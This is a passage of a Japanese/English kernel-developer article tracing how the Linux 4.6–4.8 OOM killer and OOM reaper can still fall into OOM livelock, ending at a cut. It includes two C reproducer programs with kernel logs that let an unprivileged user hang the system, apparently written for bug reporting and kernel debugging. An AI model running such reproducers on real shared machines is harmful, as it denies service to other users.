OOM killer により選ばれた子プロセスのメモリを OOM reaper が回収した後も、その子プロセスが mm_struct を解放するまでは OOM killer により再度選択されてしまいます。既に回収可能なメモリを回収したプロセスを OOM killer が選択しても、 OOM reaper はそれ以上回収できないため、 OOM livelock 状態に陥ってしまいます。これを避けるために、 -1000 を設定するようにしています。(Trap 8)

しかし、この挙動は、 Linux 4.5 までは一般ユーザの権限では発生させられなかった OOM livelock 状態を Linux 4.6 では一般ユーザの権限で発生させることができてしまうという新しい罠を発生させてしまいました。どのような場合に(Trap 8)を踏むことになるか、お気づきでしょうか?ヒントは「ひねくれ者のマルチスレッド」です。


clone() システムコールに CLONE_VM を指定して CLONE_SIGHAND を指定しなかった場合、同じ mm_struct を参照しているのに異なる /proc/$pid/oom_score_adj を持つスレッドグループが作成されます。

OOM killer は、同じ mm_struct を参照している全てのスレッドの中から、1個のスレッドだけに TIF_MEMDIE を設定します。そして、 OOM reaper は、そのスレッドから TIF_MEMDIE をクリアするのと同時に、そのスレッドを含むスレッドグループの oom_score_adj だけを -1000 に設定します。

その結果、同じ mm_struct を参照しているスレッドグループの内、1つだけが「 OOM killer により強制終了させるのが妥当ではない/ OOM reaper によりメモリを回収するのが妥当ではない」状態で、それ以外は「 OOM killer により強制終了させるのが妥当である」状態という、「超ひねくれ者のマルチスレッド」を作り出すことができてしまいました。

---------- oom-write2.c ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int writer(void *unused)
{
        static char buffer[4096];
        int fd = open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
        while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer));
        return 0;
}

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
        if (fork() == 0) {
                int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                write(fd, "1000", 4);
                close(fd);
                for (i = 0; i < 2; i++) {
                        char *stack = malloc(4096);
                        if (stack)
                                clone(writer, stack + 4096, CLONE_VM, NULL);
                }
                writer(NULL);
                while (1)
                        pause();
        }
        sleep(1);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(5);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();
        return 0;
}
---------- oom-write2.c ----------
---------- Example output start ----------
[  177.722853] a.out invoked oom-killer: gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|__GFP_ZERO), order=0, oom_score_adj=0
[  177.724956] a.out cpuset=/ mems_allowed=0
[  177.725735] CPU: 3 PID: 3962 Comm: a.out Not tainted 4.5.0-rc2-next-20160204 #291
(...snipped...)
[  177.802889] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[  177.872248] [ 3941]  1000  3941    28880      124      14       3        0             0 bash
[  177.874279] [ 3962]  1000  3962   541717   395780     784       6        0             0 a.out
[  177.876274] [ 3963]  1000  3963     1078       21       7       3        0          1000 a.out
[  177.878261] [ 3964]  1000  3964     1078       21       7       3        0          1000 a.out
[  177.880194] [ 3965]  1000  3965     1078       21       7       3        0          1000 a.out
[  177.882262] Out of memory: Kill process 3963 (a.out) score 998 or sacrifice child
[  177.884129] Killed process 3963 (a.out) total-vm:4312kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB
[  177.887100] oom_reaper: reaped process :3963 (a.out) anon-rss:0kB, file-rss:0kB, shmem-rss:0lB
[  179.638399] crond invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[  179.647708] crond cpuset=/ mems_allowed=0
[  179.652996] CPU: 3 PID: 742 Comm: crond Not tainted 4.5.0-rc2-next-20160204 #291
(...snipped...)
[  179.771311] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[  179.836221] [ 3941]  1000  3941    28880      124      14       3        0             0 bash
[  179.838278] [ 3962]  1000  3962   541717   396308     785       6        0             0 a.out
[  179.840328] [ 3963]  1000  3963     1078        0       7       3        0         -1000 a.out
[  179.842443] [ 3965]  1000  3965     1078        0       7       3        0          1000 a.out
[  179.844557] Out of memory: Kill process 3965 (a.out) score 998 or sacrifice child
[  179.846404] Killed process 3965 (a.out) total-vm:4312kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
---------- Example output end ----------

その結果、1回目の OOM reaper 呼び出しにより回収済みとなったスレッドグループは、2回目以降の OOM reaper 呼び出しが行われなくなり、誰も TIF_MEMDIE フラグをクリアしないために、 OOM livelock 状態に陥ってしまった訳です。

もし、 (kill10) の中で、 OOM killer により強制終了させることが妥当なスレッドグループであるかどうかを判断する際に、既に SIGKILL シグナルを受信しているかどうかも確認するようになっていれば、 OOM reaper を呼び出すことができ、 OOM livelock 状態に陥ることは無かった筈です。

その反省から、 Linux 4.7 では全てのスレッドグループの oom_score_adj を -1000 に設定する代わりに、 mm_struct に対して MMF_OOM_REAPED というフラグをセットするように変更されました。このように、何が起こるかを予想できない OOM 状況下の処理は、常に最悪の事態を想定して備えておくことが大切です。


5.3 The flow of OOM killer in Linux 4.7

ということで、 Linux 4.7 時点での、 OOM killer の流れを説明します。

(kill1)

order が 3 以下のメモリ割り当て要求、あるいは、 __GFP_NOFAIL フラグを含むメモリ割り当て要求が行われたものの、空きメモリを確保できなかった( OOM 状態が発生した)ことにより、 out_of_memory() ( OOM killer )が呼ばれます。

(kill2)

カレントスレッドが既に SIGKILL シグナルを受信している場合、あるいは、カレントスレッドを含むスレッドグループが既に終了しかけている( SIGNAL_GROUP_EXIT フラグが付与されている)スレッドの場合、カレントスレッドを含むスレッドグループが mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、カレントスレッドに TIF_MEMDIE フラグを付与します。

また、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、 OOM reaper の呼び出しも行います。

その後、呼び出し元に戻ります。

__GFP_FS フラグも __GFP_NOFAIL フラグも含まないメモリ割り当て要求である場合、何もせずに呼び出し元に戻ります。

(kill3)

Linux 4.5 の (kill3) と同じであるため省略します。

(kill4)

select_bad_process() は、システム上に存在する全てのスレッドグループに対して oom_scan_process_thread() を呼び出します。

それ以外は Linux 4.5 の (kill4) と同様です。

(kill5)

oom_scan_process_thread() は、そのスレッドグループが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。

TIF_MEMDIE フラグの有無の検査は、スレッド単位ではなく、そのスレッドを含むスレッドグループ単位で行われるようになりました。

それ以外は Linux 4.6 の (kill5) と同様です。

(kill6)

oom_badness() は、そのスレッドが OOM 状態にどの程度寄与しているかの判断を行います。

強制終了させることが妥当かどうかの判断に、 oom_score_adj の値が -1000 かどうかだけでなく、 MMF_OOM_REAPED フラグの有無も検査するようになりました。

それ以外は Linux 4.5 の (kill6) と同様です。

(kill7)

Linux 4.5 の (kill7) と同じであるため省略します。

(kill8)

oom_kill_process() は、実際に SIGKILL シグナルを送信して強制終了させるための処理を行います。

まず、既に終了しかけているスレッドグループの場合、そのスレッドグループが mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、そのスレッドに TIF_MEMDIE フラグを付与します。

また、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、 OOM reaper の呼び出しも行います。

その後、呼び出し元に戻ります。

(kill9)

Linux 4.5 の (kill9) と同じであるため省略します。

(kill10)

Linux 4.6 の (kill10)と同じであるため省略します。

(kill11)

mmap_sem の取得に成功した場合、 oom_score_adj に -1000 を設定する代わりに、その mm_struct に対して MMF_OOM_REAPED というフラグを設定しています。

それ以外は Linux 4.6 の (kill11) と同様です。

Linux 4.6 時点では、 mmap() を使うことで down_write(&mm->mmap_sem) による競合を発生させ、 OOM reaper の動作を妨害することで OOM livelock 状態を発生させることができていました。そのため、 Linux 4.7 では down_write_killable() が導入され、 down_write(&mm->mmap_sem) が down_write_killable(&mm->mmap_sem) に置き換えられたことで、 exit_mm() 内の down_read(&mm->mmap_sem) で動けなくなる可能性がかなり減少しました。

それでも、 down_write_killable(&mm->mmap_sem) から up_write(&mm->mmap_sem) までの間の unkillable wait で動けなくなる可能性は残っています。例えば、以下のようなプログラムを実行した場合に発生します。

---------- torture8.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/mman.h>

static int memory_eater(void *unused)
{
        const int fd = open("/proc/self/exe", O_RDONLY);
        srand(getpid());
        while (1) {
                int size = rand() % 1048576;
                void *ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
                munmap(ptr, size);
        }
        return 0;
}

static int self_killer(void *unused)
{
        srand(getpid());
        poll(NULL, 0, rand() % 1000);
        kill(getpid(), SIGKILL);
        return 0;
}

static void child(void)
{
        static char *stack[256] = { };
        char buf[32] = { };
        int i;
        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
        write(fd, "1000", 4);
        close(fd);
        snprintf(buf, sizeof(buf), "tgid=%u", getpid());
        prctl(PR_SET_NAME, (unsigned long) buf, 0, 0, 0);
        for (i = 0; i < 256; i++)
                stack[i] = malloc(4096 * 2);
        for (i = 1; i < 256 - 2; i++)
                if (clone(memory_eater, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                        _exit(1);
        if (clone(memory_eater, stack[i++] + 8192, CLONE_VM, NULL) == -1)
                _exit(1);
        if (clone(self_killer, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                _exit(1);
        _exit(0);
}

int main(int argc, char *argv[])
{
        static cpu_set_t set = { { 1 } };
        sched_setaffinity(0, sizeof(set), &set);
        if (fork() > 0) {
                char *buf = NULL;
                unsigned long size;
                unsigned long i;
                sleep(1);
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                /* Will cause OOM due to overcommit */
                for (i = 0; i < size; i += 4096)
                        buf[i] = 0;
                while (1)
                        pause();
        }
        while (1)
                if (fork() == 0)
                        child();
                else
                        wait(NULL);
        return 0;
}
---------- torture8.c ----------
---------- Example output start ----------
[  156.182149] oom_reaper: reaped process 13333 (tgid=13079), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  157.113150] oom_reaper: reaped process 4372 (tgid=4118), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  157.995910] oom_reaper: reaped process 11029 (tgid=10775), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  158.181043] oom_reaper: reaped process 11285 (tgid=11031), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  169.049766] oom_reaper: reaped process 11541 (tgid=11287), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  169.323695] oom_reaper: reaped process 11797 (tgid=11543), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  176.294340] oom_reaper: reaped process 12309 (tgid=12055), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  240.458346] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729
[  241.950461] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729
[  301.956044] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729
[  303.654382] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729
[  349.771068] oom_reaper: reaped process 13589 (tgid=13335), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  349.996636] oom_reaper: reaped process 13845 (tgid=13591), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  350.704767] oom_reaper: reaped process 14357 (tgid=14103), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[  351.656833] Out of memory: Kill process 5652 (tgid=5398) score 999 or sacrifice child
[  351.659127] Killed process 5652 (tgid=5398) total-vm:6348kB, anon-rss:1116kB, file-rss:12kB, shmem-rss:0kB
[  352.664419] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  357.238418] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  358.621747] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  359.970605] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  361.423518] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  362.704023] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  363.832115] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=25279
[  364.148948] MemAlloc: tgid=5398(5652) flags=0x400040 switches=266 dying victim
[  364.150851] tgid=5398       R  running task    12920  5652      1 0x00100084
[  364.152773]  ffff88000637fbe8 ffffffff8172b257 000091fa78a0caf8 ffff8800389de440
[  364.154843]  ffff880006376440 ffff880006380000 ffff880078a0caf8 ffff880078a0caf8
[  364.156898]  ffff880078a0cb10 ffff880078a0cb00 ffff88000637fc00 ffffffff81725e1a
[  364.158972] Call Trace:
[  364.159979]  [<ffffffff8172b257>] ? _raw_spin_unlock_irq+0x27/0x50
[  364.161691]  [<ffffffff81725e1a>] schedule+0x3a/0x90
[  364.163170]  [<ffffffff8172a366>] rwsem_down_write_failed+0x106/0x220
[  364.164925]  [<ffffffff813bd2c7>] call_rwsem_down_write_failed+0x17/0x30
[  364.166737]  [<ffffffff81729877>] down_write+0x47/0x60
[  364.168258]  [<ffffffff811c3284>] ? vma_link+0x44/0xc0
[  364.169773]  [<ffffffff811c3284>] vma_link+0x44/0xc0
[  364.171255]  [<ffffffff811c5c05>] mmap_region+0x3a5/0x5b0
[  364.172822]  [<ffffffff811c6204>] do_mmap+0x3f4/0x4c0
[  364.174324]  [<ffffffff811a64dc>] vm_mmap_pgoff+0xbc/0x100
[  364.175894]  [<ffffffff811c4060>] SyS_mmap_pgoff+0x1c0/0x290
[  364.177499]  [<ffffffff81002c91>] ? do_syscall_64+0x21/0x170
[  364.179118]  [<ffffffff81022b7d>] SyS_mmap+0x1d/0x20
[  364.180592]  [<ffffffff81002ccc>] do_syscall_64+0x5c/0x170
[  364.182140]  [<ffffffff8172b9da>] entry_SYSCALL64_slow_path+0x25/0x25
[  364.183855] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  365.199023] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=28254
[  366.283955] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  368.158264] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  369.568325] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  371.416533] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  373.159185] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  374.835808] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  376.386226] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  378.223962] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  379.601584] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  381.067290] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  382.394818] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  383.918460] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  385.540088] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  386.915094] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  388.297575] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  391.598638] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  393.580423] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  395.744709] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  397.377497] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  399.614030] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  401.103803] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  402.484887] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  404.503755] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  406.433219] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  407.958772] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  410.094990] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  413.509253] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  416.820991] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  420.485121] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  422.302336] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  424.623738] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  425.204811] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064
[  425.592191] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064
[  430.507619] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  432.487807] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  436.810127] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  439.310553] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  441.404857] oom_reaper: unable to reap pid:5652 (tgid=5398)
---------- Example output end ----------

しかし、 mmap_sem を排他モードで取得している間に呼び出されうる全ての処理を killable に書き直すのは、エラーハンドリングが複雑になりすぎるので、現実的ではありません。そのため、 Linux 4.8 では OOM reaper が mmap_sem を共有モードで取得できない状態が2回発生した場合、既に OOM reaper による回収が済んだものとして扱われるようになります。


5.4 The flow of OOM killer in Linux 4.8

ということで、 Linux 4.8-rc1 時点での、 OOM killer の流れを説明します。

(kill1)

Linux 4.7 の (kill1) と同じであるため省略します。

(kill2)

カレントスレッドがまだ mm_struct を解放しておらず、その mm_struct を使用しているスレッドグループが全て終了しかけている( SIGNAL_GROUP_EXIT フラグまたは PF_EXITING フラグが付与されている)場合、その mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、カレントスレッドに TIF_MEMDIE フラグを付与し、 OOM reaper の呼び出しを行います。

それ以外は Linux 4.7 の (kill2) と同様です。

(kill3)

Linux 4.5 の (kill3) と同じであるため省略します。

(kill4)

Linux 4.7 の (kill4) と同じであるため省略します。

(kill5)

oom_scan_process_thread() は、そのスレッドグループが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。

そのスレッドグループ内に TIF_MEMDIE フラグが付与されたスレッドが存在している場合、 MMF_OOM_REAPED フラグの有無を検査します。そして、 MMF_OOM_REAPED フラグが付与されている場合、そのスレッドグループを無視します。

それ以外は Linux 4.7 の (kill5) と同様です。

(kill6)

oom_badness() は、そのスレッドが OOM 状態にどの程度寄与しているかの判断を行います。

強制終了させることが妥当かどうかの判断に、 oom_score_adj の値と MMF_OOM_REAPED フラグの有無だけでなく、そのスレッドが vfork() により作成されたかどうか検査するようになりました。これは、 vfork() により作成された子プロセスは、親プロセスが使用している mm_struct を共有しているだけなので、 vfork() により作成された子プロセスを強制終了させてもほとんど意味が無いという推測に基づいています。(Trap 9)

それ以外は Linux 4.7 の (kill6) と同様です。

(kill7)

Linux 4.5 の (kill7) と同じであるため省略します。

(kill8)

oom_kill_process() は、実際に SIGKILL シグナルを送信して強制終了させるための処理を行います。

そのスレッドがまだ mm_struct を解放しておらず、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、その mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、そのスレッドに TIF_MEMDIE フラグを付与し、 OOM reaper の呼び出しを行い、呼び出し元に戻ります。

(kill9)

Linux 4.5 の (kill9) と同じであるため省略します。

(kill10)

その mm_struct を使用している他のスレッドグループに対しても、 OOM killer により強制終了させることが妥当なスレッドグループであれば SIGKILL シグナルを送信します。この際、 oom_score_adj の値は無視します。これは、( oom_score_adj の値は /proc/$pid/oom_score_adj から変更できますが、)同じ mm_struct を共有している複数の $pid が異なる oom_score_adj の値を持っている状態を認める理由が見当たらないという推測により、( vfork() された場合を除いて)同じ mm_struct を共有しているスレッドグループ間では同じ oom_score_adj の値を共有するように修正されたためです。(Trap 10)

また、 mm_struct を共有しているのが(終了するとカーネルパニックが発生する) init プロセスまたは(強制終了させるのが妥当ではない)カーネルスレッドの場合、 OOM reaper を呼び出すことができません。 OOM reaper を呼び出すことができないことにより OOM livelock 状態に陥るのを回避するため、その mm_struct に対して MMF_OOM_REAPED フラグをセットすることで、 (kill5) の検査において、その mm_struct が無視されるようにします。(Trap 11)

それ以外はLinux 4.6 の (kill10) と同様です。

(kill11)

mmap_sem の取得に2回失敗した場合、その mm_struct に対して MMF_OOM_REAPED というフラグを設定します。

それ以外は Linux 4.7 の (kill11) と同様です。

せっかく「 OOM killer が発動できた場合に OOM livelock 状態に陥る」問題への対処を始めたのだから、単に OOM livelock 状態に陥る確率を減らすだけでなく、 OOM killer が発動できる限りは OOM livelock 状態に陥らないことを証明できるようにしたいですよね?ですので、 Linux 4.8 では、証明できるようになることを目指して現在進行中です。

Linux 4.6 までの task_will_free_mem() はスレッド単位、 Linux 4.7 ではスレッドグループ単位での検査を行っていましたが、 Linux 4.8 では mm_struct 単位での検査を行うようになります。しかし、スレッド単位かスレッドグループ単位か mm_struct 単位かを問わず、同じスレッドに対して out_of_memory() から task_will_free_mem() のショートカットを永遠に利用できるようになっている限り、 OOM livelock 状態が発生する可能性が残ってしまいます。そのため、 Linux 4.8 では、 (kill2) において、既に OOM reaper による回収が済んでいる場合には task_will_free_mem() のショートカットを利用できないように変更されます。

さて、果たして Linux 4.8 で OOM livelock 状態に陥らないことを証明できるようになるのでしょうか?その答えは、「残念ながら」です。ということで、残りの罠について説明します。

(Trap 9)は、メモリ消費の大部分は mm_struct に関連付けされているという前提に起因します。 oom_score_adj の使われ方として、「 OOM killer により強制終了させられない( oom_score_adj の値が -1000 に設定されている)状態にある親プロセスが vfork() により子プロセスを作成し、子プロセスを OOM killer により強制終了させることができる( oom_score_adj の値が 0 に設定されている)状態に変更した上で、子プロセスが execve() システムコールを用いてプログラムを実行する」というケースが存在しているため、 vfork() により作成された子プロセスは親プロセスとは異なる oom_score_adj の値を持つことを認めるという例外を設けています。しかし、 CVE-2010-4243 で示されたように、 execve() システムコールの argv[]/envp[] 引数として、相当な量のメモリを mm_struct に関連付けずに消費することは vfork() により作成された子プロセスでも可能です。そのため、 vfork() により作成された子プロセスを強制終了の対象外とするという判断は、常に望ましいとは限りません。しかし、 Michal Hocko さんは「そのような間抜けな処理を許す方が悪い」という考え方であるため、そのまま採用されてしまいました。

(Trap 10)は、「超ひねくれ者のマルチスレッド」が原因で OOM reaper を起動できないことにより OOM livelock 状態に陥るのを回避するためのものです。親プロセスと vfork() により作成された子プロセスとで OOM killer により強制終了させられるかどうかが異なる場合も、「超ひねくれ者のマルチスレッド」と考えることができます。しかし、そもそも「ひねくれ者のマルチスレッド」を作成するプログラムには、何らかの理由がある筈です。例えば、 OOM killer が発動するギリギリ直前の状況を試験するために「超ひねくれ者のマルチスレッド」として動作するプログラムが存在する可能性は否定できないのです。

(Trap 11)は、 OOM killer が発動できる限りは OOM livelock 状態に陥らないことを証明できていない、唯一の箇所です。

OOM reaper を呼び出すことができなかった場合でも OOM livelock 状態に陥るのを回避する方法としては、メモリ回収処理を行っても安全かどうかの判断を OOM reaper に委任することで、「 OOM killer が TIF_MEMDIE フラグを付与するのと常にセットで OOM reaper を呼び出すようにする」方法が考えられます。しかし、 Michal Hocko さんは「メモリ回収処理を行えないことが明らかな場合には、 OOM reaper に処理を引き継がずに OOM killer 内で対処したい」という考え方であるため、この方法を拒み続けています。

「 OOM reaper に処理を引き継がずに OOM killer 内で対処する」方法としては、 (kill10) において MMF_OOM_REAPED フラグを設定するのと一緒に (kill9) において付与された TIF_MEMDIE フラグをクリアするという方法が考えられます。 Linux 4.6 で OOM reaper が TIF_MEMDIE フラグをクリアするという挙動をするようになったとき、サスペンド機能との競合問題を回避するために OOM reaper のカーネルスレッドを freezable にするという変更も採用されました。しかし、その後の調査で、カーネルスレッドを freezable にしてもサスペンド機能との競合問題を回避できていなかったことが判明しました。そして、「サスペンド機能との競合問題を回避するためのパッチを使わずに済ませたいので、 OOM reaper や OOM killer が TIF_MEMDIE フラグをクリアするという挙動は避けたい」という考え方になったため、 (kill10) において TIF_MEMDIE フラグをクリアするという方法も拒み続けています。

その結果、 Linux 4.8 で採用されることになっているのが、 (kill5) の検査において、 TIF_MEMDIE フラグが付与されていても MMF_OOM_REAPED フラグも付与されている場合、その mm_struct を無視するという挙動です。しかし、 (kill5) の検査において、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を取得するために呼び出している find_lock_task_mm() 関数は、そのスレッドグループの全てのスレッドが mm_struct を解放した後は取得できないという問題があります。この問題に対処する方法としては、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を find_lock_task_mm() 関数で取得できなかった場合、 OOM_SCAN_ABORT ではなく OOM_SCAN_CONTINUE を返却するという方法が考えられます。しかし、「 Linux 4.8 で急いで対処する必要性がある話ではない」という考え方であるため、この方法も拒否されました。その結果、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を find_lock_task_mm() 関数で取得できなかった場合は OOM_SCAN_ABORT が返却されるため、僅かではありますが OOM livelock 状態に陥る可能性が残ってしまった訳です。(残念!)

現在は、 Linux 4.9 に向けて、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を find_lock_task_mm() 関数を使わずに取得できるようにすることで、 OOM killer や OOM reaper が TIF_MEMDIE フラグをクリアするという挙動に依存しない形で、 OOM killer が発動できる限りは OOM livelock 状態に陥らないことを証明できる方法を模索しているところです。

ちなみに、 OOM reaper は MMU 対応カーネル( CONFIG_MMU=y というカーネルコンフィグを指定してコンパイルされるカーネル)でのみ利用可能です。 MMU 非対応カーネル( CONFIG_MMU=y というカーネルコンフィグを指定しないでコンパイルされるカーネル)では OOM reaper を利用できないため、 MMU 非対応カーネルに関しては、「 OOM killer が発動できた場合に OOM livelock 状態に陥る」問題が発生しないことを証明するどころか、全く改善されていません。誰も MMU 非対応カーネルでの動作テストをしないため、もしかすると、 MMU 対応カーネルのための修正により、 MMU 非対応カーネルで OOM livelock 状態が発生しやすくなっている可能性さえあります。 MMU 非対応カーネルでも使える方法としてタイムアウトを使う方法も考えられますが、 Michal Hocko さんは「そもそも MMU 非対応環境で OOM livelock が発生した事例を聞いたことが無い( MMU 非対応環境では OOM livelock を引き起こすような無茶なメモリの使い方をさせない筈だ)」という考え方であるため、対処される見通しはありません。

そろそろ「 OOM killer が発動できた場合に OOM livelock 状態に陥る」という問題は終わらせて、「 OOM killer が発動できないまま OOM livelock 状態に陥る」というとっても厄介な問題への対処に注力してほしいものです。


Chapter 6   Troubles regarding kernel's memory management


6.1 Kernel Memory Allocation Watchdog (kmallocwd)

Like I explained at timeout-based workarounds, we will be able to avoid OOM livelock situation if we are allowed to invoke the OOM killer based on some timeout. But so far there is no chance for accepting timeout-based judgement. And due to the existence of the "too small to fail" memory-allocation rule, we cannot do anything when OOM livelock situation occurs.

Then, at least we want to be notified of stalling memory allocation requests when OOM livelock situation might be occurring. Otherwise, we cannot tell whether the cause is related to memory allocation requests when a system hung up.

Therefore, I have been proposing Kernel Memory Allocation Watchdog (kmallocwd) functionality which monitors memory allocation requests in kernel space. (The lines like MemAlloc: in this page are output from this functionality.)

Addressing bugs caused by software resembles identifying criminal person and turning over by yourself. Since Linux kernel's memory management subsystem does not print any message when something unexpected is occurring, the skill for identifying criminal person and turning over by yourself is especially strongly required. But not all Linux users have such skill.

This functionality is an important first-step aid for isolating the problem, but there is no chance for accepting this functionality because justification / necessity of adding such large amount of operations is considered questionable. Unless more and more people reports problems as "this may be a bug related with memory management subsystem" enough to bother memory management persons, memory management persons will remain asserting innocence without knowing "what problems are occurring".


6.2 Various ambushes, in chronological order?

In this section, I enumerate various bugs of memory management under OOM situations which are not yet explained in sections above. For each bug, I attach reproducer program as needed.


November 2014  SysRq-f cannot invoke the OOM killer due to dependency on workqueue

Since SysRq-f request from keyboard is processed in interrupt context, it cannot synchronously wait for completion of the OOM killer. Therefore, SysRq-f enqueues a request to invoke the OOM killer using system_wq which is shared among the hole system, and the OOM killer is asynchronously triggered by the workqueue kernel thread. But when the workqueue is processing other requests, that workqueue cannot process the request to invoke the OOM killer.

Therefore, when the workqueues got stuck due to OOM livelock situation, the workqueue cannot invoke the OOM killer forever, and the system cannot recover from OOM livelock situation using SysRq-f request.

Since the OOM reaper was introduced, TIF_MEMDIE flag is automatically cleared by the OOM reaper, and the OOM killer can continue selecting next OOM victim. Therefore, in many cases, occurrence of OOM livelock situation is avoided.

November 2014  The OOM killer invoked by SysRq-f keeps selecting the same TIF_MEMDIE thread

Like I demonstrated at memset+write case, the OOM killer invoked by SysRq-f request selects next OOM victim even if there is a thread with TIF_MEMDIE flag set. But the logic of select_bad_process() simply selects a thread group with largest oom_badness() value (without taking into account whether that thread group has a thread with TIF_MEMDIE flag already set). As a result, when OOM livelock situation occurred, SysRq-f forever selects a thread with TIF_MEMDIE flag already set, and the system cannot recover from OOM livelock situation using SysRq-f request.

Since the OOM reaper was introduced, thread groups with a TIF_MEMDIE thread are automatically ignored, and the OOM killer can continue selecting next OOM victim. Therefore, in many cases, occurrence of OOM livelock situation is avoided.

December 2014  The OOM killer sets TIF_MEMDIE to already terminating thread

